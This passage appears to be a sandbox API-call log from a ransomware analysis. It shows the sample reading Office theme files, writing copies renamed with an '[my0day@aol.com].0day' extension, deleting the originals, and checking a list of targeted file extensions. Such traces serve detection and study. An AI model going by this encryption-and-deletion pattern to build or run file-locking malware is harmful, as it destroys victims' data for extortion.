dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0273.723] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=43357) returned 1 [0273.723] CloseHandle (hObject=0x354) returned 1 [0273.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 0x20 [0273.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.766] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.766] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.767] GetLastError () returned 0x0 [0273.767] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xa95d, lpOverlapped=0x0) returned 1 [0273.769] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xa960, lpOverlapped=0x0) returned 1 [0273.771] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.771] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0273.771] SetEndOfFile (hFile=0x384) returned 1 [0273.771] CloseHandle (hObject=0x384) returned 1 [0273.771] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.771] SetEndOfFile (hFile=0x39c) returned 1 [0273.774] CloseHandle (hObject=0x39c) returned 1 [0273.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 1 [0273.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.774] lstrlenW (lpString=".doc") returned 4 [0273.774] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".docx") returned 5 [0273.775] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.775] lstrlenW (lpString=".pdf") returned 4 [0273.775] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".xls") returned 4 [0273.775] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".xlsx") returned 5 [0273.775] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.775] lstrlenW (lpString=".ppt") returned 4 [0273.775] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.775] lstrlenW (lpString=".zip") returned 4 [0273.775] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".rar") returned 4 [0273.775] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".bz2") returned 4 [0273.775] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.775] lstrlenW (lpString=".7z") returned 3 [0273.775] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.775] lstrlenW (lpString=".dbf") returned 4 [0273.776] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".1cd") returned 4 [0273.776] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".jpg") returned 4 [0273.776] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".doc") returned 4 [0273.776] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".docx") returned 5 [0273.776] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.776] lstrlenW (lpString=".pdf") returned 4 [0273.776] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".xls") returned 4 [0273.776] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".xlsx") returned 5 [0273.776] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.776] lstrlenW (lpString=".ppt") returned 4 [0273.776] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".zip") returned 4 [0273.776] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".rar") returned 4 [0273.776] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".bz2") returned 4 [0273.776] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString=".7z") returned 3 [0273.776] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".dbf") returned 4 [0273.776] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.776] lstrlenW (lpString=".1cd") returned 4 [0273.777] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78 [0273.777] lstrlenW (lpString=".jpg") returned 4 [0273.777] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.777] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.777] lstrlenW (lpString="Oriel.eftx") returned 10 [0273.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.790] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=43193) returned 1 [0273.790] CloseHandle (hObject=0x39c) returned 1 [0273.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 0x20 [0273.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.791] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.791] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.791] GetLastError () returned 0x0 [0273.791] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xa8b9, lpOverlapped=0x0) returned 1 [0273.794] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xa8c0, lpOverlapped=0x0) returned 1 [0273.796] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.796] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0273.796] SetEndOfFile (hFile=0x384) returned 1 [0273.796] CloseHandle (hObject=0x384) returned 1 [0273.796] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.796] SetEndOfFile (hFile=0x39c) returned 1 [0273.799] CloseHandle (hObject=0x39c) returned 1 [0273.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.799] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 1 [0273.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.799] lstrlenW (lpString=".doc") returned 4 [0273.799] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.799] lstrlenW (lpString=".docx") returned 5 [0273.799] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.799] lstrlenW (lpString=".pdf") returned 4 [0273.800] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".xls") returned 4 [0273.800] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".xlsx") returned 5 [0273.800] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.800] lstrlenW (lpString=".ppt") returned 4 [0273.800] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString=".zip") returned 4 [0273.800] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".rar") returned 4 [0273.800] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".bz2") returned 4 [0273.800] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".7z") returned 3 [0273.800] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString=".dbf") returned 4 [0273.800] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString=".1cd") returned 4 [0273.800] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString=".jpg") returned 4 [0273.800] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.800] lstrlenW (lpString=".doc") returned 4 [0273.800] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".docx") returned 5 [0273.800] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.800] lstrlenW (lpString=".pdf") returned 4 [0273.800] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".xls") returned 4 [0273.800] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.800] lstrlenW (lpString=".xlsx") returned 5 [0273.800] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.801] lstrlenW (lpString=".ppt") returned 4 [0273.801] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.801] lstrlenW (lpString=".zip") returned 4 [0273.801] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString=".rar") returned 4 [0273.801] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString=".bz2") returned 4 [0273.801] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString=".7z") returned 3 [0273.801] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.801] lstrlenW (lpString=".dbf") returned 4 [0273.801] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.801] lstrlenW (lpString=".1cd") returned 4 [0273.801] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0273.801] lstrlenW (lpString=".jpg") returned 4 [0273.801] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.801] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.801] lstrlenW (lpString="Paper.eftx") returned 10 [0273.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.802] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=228746) returned 1 [0273.802] CloseHandle (hObject=0x39c) returned 1 [0273.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 0x20 [0273.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.803] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.803] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.803] GetLastError () returned 0x0 [0273.803] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x37d8a, lpOverlapped=0x0) returned 1 [0273.809] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x37d90, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x37d90, lpOverlapped=0x0) returned 1 [0273.899] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.899] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0273.899] SetEndOfFile (hFile=0x384) returned 1 [0273.899] CloseHandle (hObject=0x384) returned 1 [0273.899] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.899] SetEndOfFile (hFile=0x39c) returned 1 [0273.906] CloseHandle (hObject=0x39c) returned 1 [0273.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.977] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 1 [0273.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.978] lstrlenW (lpString=".doc") returned 4 [0273.978] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.978] lstrlenW (lpString=".docx") returned 5 [0273.978] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.978] lstrlenW (lpString=".pdf") returned 4 [0273.978] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.978] lstrlenW (lpString=".xls") returned 4 [0273.978] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.978] lstrlenW (lpString=".xlsx") returned 5 [0273.978] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.978] lstrlenW (lpString=".ppt") returned 4 [0273.978] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.978] lstrlenW (lpString=".zip") returned 4 [0273.978] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".rar") returned 4 [0273.979] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".bz2") returned 4 [0273.979] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".7z") returned 3 [0273.979] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString=".dbf") returned 4 [0273.979] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString=".1cd") returned 4 [0273.979] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString=".jpg") returned 4 [0273.979] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString=".doc") returned 4 [0273.979] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".docx") returned 5 [0273.979] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.979] lstrlenW (lpString=".pdf") returned 4 [0273.979] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".xls") returned 4 [0273.979] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".xlsx") returned 5 [0273.979] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.979] lstrlenW (lpString=".ppt") returned 4 [0273.979] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.979] lstrlenW (lpString=".zip") returned 4 [0273.979] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.979] lstrlenW (lpString=".rar") returned 4 [0273.980] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.980] lstrlenW (lpString=".bz2") returned 4 [0273.980] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.980] lstrlenW (lpString=".7z") returned 3 [0273.980] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.980] lstrlenW (lpString=".dbf") returned 4 [0273.980] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.980] lstrlenW (lpString=".1cd") returned 4 [0273.980] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0273.980] lstrlenW (lpString=".jpg") returned 4 [0273.980] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.980] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.980] lstrlenW (lpString="Technic.eftx") returned 12 [0273.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0273.997] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=23692) returned 1 [0273.997] CloseHandle (hObject=0x318) returned 1 [0273.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 0x20 [0274.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 